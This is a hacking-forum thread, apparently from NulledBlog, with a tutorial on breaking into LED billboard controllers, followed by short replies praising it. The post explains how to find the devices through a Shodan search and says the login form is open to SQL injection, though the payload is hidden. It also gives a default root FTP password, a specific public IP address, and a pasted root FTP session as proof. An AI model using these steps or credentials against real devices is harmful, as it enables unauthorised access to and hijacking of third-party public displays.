Jump to content

Welcome to NulledBlog
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. If you already have an account, login here - otherwise create an account for free today!
Photo

[Tutorial] How to Hack Billboards

hack Billboards

  • Please log in to reply
4 replies to this topic

#1
TimeCenter

  • Offline
  • Hack The Time :D

  • Posts:
    79
    Reputation:
    5
    Joined:
    08 Jul, 2016

Step 1. Register to shodan
Step 2. Look up: title:"lednet live system"

You'll find some!

Example: 186.206.188.175:8060/en/main.html

How to hack it? Well the Username Parameter is vulnerable to SQL Injection......

So to login, paste

Hidden Content
You'll be able to see the hidden content once you reply to this topic.


in the username parameter and anything in the password input. Now click login!


Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....

Username: root
Password: 111111

$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name (186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x    1 0        0            1464 Jan 01  1970 bin
lrwxrwxrwx    1 0        0              21 Jan 01  1970 c: -> /usr/local/playdata/c
lrwxrwxrwx    1 0        0              21 Jan 01  1970 d: -> /usr/local/playdata/d
drwxr-xr-x    7 0        0               0 May 21 18:08 dev
lrwxrwxrwx    1 0        0              21 Jan 01  1970 e: -> /usr/local/playdata/e
drwxr-xr-x    1 0        0             748 Jan 01  1970 etc
lrwxrwxrwx    1 0        0              21 Jan 01  1970 f: -> /usr/local/playdata/f
drwxr-xr-x    1 0        0              36 Jan 01  1970 home
drwxr-xr-x    1 0        0            1868 Jan 01  1970 lib
lrwxrwxrwx    1 0        0              11 Jan 01  1970 linuxrc -> bin/busybox
drwxr-xr-x    1 0        0              32 Jan 01  1970 mnt
drwxr-xr-x    1 0        0               0 Jan 01  1970 opt
dr-xr-xr-x   51 0        0               0 Jan 01  1970 proc
drwxr-xr-x    1 0        0             116 Jan 01  1970 root
drwxr-xr-x    1 0        0            1332 Jan 01  1970 sbin
drwxr-xr-x   12 0        0               0 Jan 01  1970 sys
drwxrwxrwt    6 0        0             720 May 21 18:16 tmp
drwxr-xr-x    1 0        0             108 Jan 01  1970 usr
drwxr-xr-x    3 0        0             672 Jan 01  1970 var
drwxr-xr-x    4 0        0             288 Jan 01  1970 www
226 Directory send OK.
ftp>



 


  • 0

#2
hydralolz

  • Offline
  • Veteran

  • PipPipPipPipPipPipPip
  • Posts:
    524
    Reputation:
    827
    Joined:
    30 Jan, 2015

Nice :)


  • 0

#3
NewbieAcount

  • Offline
  • New Member

  • Posts:
    14
    Reputation:
    0
    Joined:
    01 Oct, 2016

nice


  • 0

#4
alvisql

  • Offline
  • Lurker

  • Posts:
    3
    Reputation:
    0
    Joined:
    01 Oct, 2016

nice


nice tho!


  • 0

#5
XR8ED

  • Offline
  • Advanced Member

  • Posts:
    96
    Reputation:
    0
    Joined:
    08 Sep, 2015

ty nice share


  • 0



Also tagged with one or more of these keywords: hack, Billboards

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users